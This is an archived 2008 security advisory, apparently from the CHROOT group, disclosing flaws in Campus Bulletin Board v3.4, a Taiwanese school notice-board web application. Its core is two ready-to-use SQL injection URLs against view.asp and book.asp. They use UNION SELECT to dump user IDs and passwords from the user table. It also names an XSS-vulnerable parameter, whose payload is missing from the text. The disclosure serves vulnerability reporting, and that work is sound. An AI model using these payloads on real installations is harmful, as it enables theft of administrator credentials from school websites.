TUCoPS :: Web BBS :: etc :: bx3309.htm

Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities
Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities
Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities


  _____ _   _ _____  _____ _____ _____  =0D
 /  ___| |_| |  _  \|  _  |  _  |_   _| =0D
 | (___|  _  | [_)_/| (_) | (_) | | |   =0D
 \_____|_| |_|_| |_||_____|_____| |_|   =0D
        C. H. R. O. O. T.  SECURITY  GROUP=0D
        - -- ----- --- -- -- ---- --- -- -=0D
http://www.chroot.org=0D 
=0D
                     _   _ _ _____ ____ ____ __  _ =0D
   Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |=0D
   Conference 2008  |  _  | | | | | (__| () |     |=0D
                    |_| |_|_| |_| \____|____|_|\__|=0D
http://www.hitcon.org=0D 
=0D
=0D
Title :: Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities=0D
=0D
Author :: unohope [at] chroot [dot] org=0D
=0D
IRC :: irc.chroot.org #chroot=0D
=0D
ScriptName :: 校園行政網路公告欄 v3.4=0D
=0D
Download :: http://netlab.kh.edu.tw/download/post3/post34_961113.exe=0D 
=0D
Mirror :: http://www.badongo.com/file/9514022=0D 
=0D
_______________=0D
[SQL Injection]=0D
=0D
- {view.asp} -=0D
=0D
http://localhost/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1=0D 
=0D
- {book.asp} -=0D
=0D
http://localhost/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄+Where+'%'=('=0D 
=0D
______________________=0D
[Cross Site-Scripting]=0D
=0D
- {book.asp} -=0D
=0D
http://localhost/post3/Book.asp?review==0D 
=0D
______=0D
[NOTE]=0D
=0D
!! This is just for educational purposes, DO NOT use for illegal. !!=0D
=0D
=0D
# 2008/5/24 - chrO.ot group #=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH